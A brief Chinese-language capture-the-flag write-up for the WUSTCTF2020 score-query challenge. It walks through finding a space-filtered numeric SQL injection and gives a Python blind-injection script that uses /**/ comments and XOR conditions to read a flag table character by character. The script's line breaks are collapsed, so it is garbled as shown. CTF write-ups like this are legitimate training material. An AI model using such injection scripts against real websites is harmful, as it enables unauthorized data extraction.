[WUSTCTF2020]颜值成绩查询
只有一个输入框,是sql注入题目
尝试输入1,2,3
可以发现是get方法提交的参数且是数字型
故用hackbar
/?stunum=1 or 1=2 %23
student number not exists.
刚刚还可以查到现在查不到了判断存在过滤
尝试下发现是空格
上盲注脚本
import stringimport requests
select=f"select/**/value/**/from/**/flag"
ans=""
for i in range(1,100):for ascii in range(32,128):url = f"http://adad8be9-a1e6-4d5b-9bd5-6dc612e1db73.node4.buuoj.cn:81/?stunum=1^(ascii(substr(({select}),{i},1))={ascii})^1"print(url)print(ans)res=requests.get(url)if "Hi admin, your score is: 100" in res.text:ans+=chr(ascii)breakif ascii ==127:exit(0)